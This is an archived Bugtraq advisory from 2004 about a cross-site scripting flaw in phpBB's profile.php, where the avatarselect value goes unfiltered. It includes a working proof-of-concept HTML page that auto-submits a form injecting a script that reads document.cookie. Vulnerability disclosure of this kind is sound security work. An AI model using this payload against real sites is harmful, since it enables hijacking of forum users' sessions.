Bugtraq mailing list archives

phpBB profile.php Cross Site Scripting Vulnerability

From: Cheng Peng Su <apple_soup () msn com>
Date: 21 Mar 2004 03:36:19 -0000




#####################################################################

 Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
  Release Date : Mar 21,2004 
   Application : phpBB
       Version : phpBB 2.0.6d or others?
      Platform : PHP
    Vendor URL : http://www.phpbb.com/
        Author : Cheng Peng Su(apple_soup_at_msn.com)
     
#####################################################################

 Proof of Conecpt:
  
     This vuln is in profile.php,when you click [Show Gallery],phpBB 
  will show you Avatar gallery,asking you to choose one for yourself.
  The hole is in the form,after submitting phpBB will use the value of 
  "avatarselect" as the path of the gallery directly,without filtering
  any illegal characters.
   
 Exploit:
  
  -------------exploit.htm--------------
  <form name='f' action="http://site/profile.php?mode=editprofile"; method="post">
  <input name="avatarselect" value='" >&lt;script&gt;alert(document.cookie)&lt;/script&gt;'>
  <input type="submit" name="submitavatar" value="Select avatar">
  </form>
  &lt;script&gt;
  window.onload=function()
   {
    document.all.submitavatar.click();
   }
  &lt;/script&gt;
  ---------------end-------------------
  
 Contact:
 
  Cheng Peng Su
  Class 1,Senior 2,High school attached to Wuhan University
  Wuhan,Hubei,China(430072)
  apple_soup_at_msn.com

Current thread:

phpBB profile.php Cross Site Scripting Vulnerability Cheng Peng Su (Mar 22)
- <Possible follow-ups>
- RE: Fw: phpBB profile.php Cross Site Scripting Vulnerability micheal () michealcottingham com (Mar 22)